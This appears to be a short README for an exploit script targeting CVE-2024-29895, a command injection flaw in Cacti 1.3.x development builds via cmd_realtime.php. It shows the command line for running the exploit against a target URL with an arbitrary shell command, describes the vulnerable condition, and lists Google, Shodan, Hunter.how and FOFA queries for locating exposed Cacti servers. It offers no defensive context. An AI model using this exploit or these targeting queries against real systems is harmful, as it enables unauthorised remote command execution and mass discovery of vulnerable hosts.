python3 cve-2024-29895.py -u https://target.com/ -c id
Affecting Cacti versions 1.3.X on DEV builds where cmd_realtime.php is present and POLLER_ID is enabled.
Command Injection is possible via this endpoint, by requesting via GET with payload as HTML Query Parameters
Google: inurl:cmd_realtime.php
Shodan: Cacti
Hunter.how: /product.name="Cacti"
FOFA: app="Cacti-Monitoring"